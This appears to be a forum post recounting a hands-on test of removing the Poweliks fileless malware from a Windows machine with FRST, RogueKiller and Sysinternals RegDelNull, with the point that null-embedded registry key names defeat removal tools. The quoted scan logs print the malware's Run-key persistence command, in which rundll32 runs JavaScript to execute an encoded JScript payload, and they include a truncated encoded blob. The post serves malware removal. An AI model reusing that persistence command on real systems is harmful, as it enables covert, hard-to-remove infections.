The Registry key(s) have a null in, That is why FRST, Roguekiller etc struggle in removing the key(s) even if they say they have done so.
A test I did with Poweliks on my system (no VM or SandBox etc), Took longer due to me just testing FRST and Roguekiller a few weeks ago. There can alsways be new Reg key changes by Poweliks
Poweliks in log FRST
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current (the data entry has 31 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).
InvalidSubkeyName: [HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] <===== ATTENTION
Try removal
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**a<*> => Value Deleted Successfully.
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
[HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] => Subkey with invalid name deleted successfully.
Rescan, oh 2 keys still there, try again
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current (the data entry has 31 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).
Try removal, round 2
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**a<*> => Value Deleted Successfully.
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
Still holding in location, check null
Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.
C:\Users\Marewa>C:\Users\John\Desktop\regdelnull hku -s
RegDelNull v1.10 - Delete Registry keys with embedded Nulls
Copyright © 2005-2006 Mark Russinovich
Sysinternals -
www.sysinternals.com
Null-embedded key (Nulls are replaced by '*'):
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\Cu
rrentVersion\Run\|*|
Delete? (y/n)
Ok try the one other tool (Roguekiller)
[Tr.Poweliks] HKEY_USERS\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run | ?a : rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
-> DELETED
Now check for the 2 entries
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).
InvalidSubkeyName: [HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] <===== ATTENTION
Nope still there, time to remove Null
Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.
C:\Users\Marewa>C:\Users\John\Desktop\regdelnull hku -s
RegDelNull v1.10 - Delete Registry keys with embedded Nulls
Copyright © 2005-2006 Mark Russinovich
Sysinternals -
www.sysinternals.com
Null-embedded key (Nulls are replaced by '*'):
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\Cu
rrentVersion\Run\|*|
Delete? (y/n) y
key successfully deleted.
Scan complete
Check for the 2 entries, OK, one left, null is now gone
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
Completed, Poweliks gone
If tools are struggling or cannot remove a item for poweliks check for a null
Quads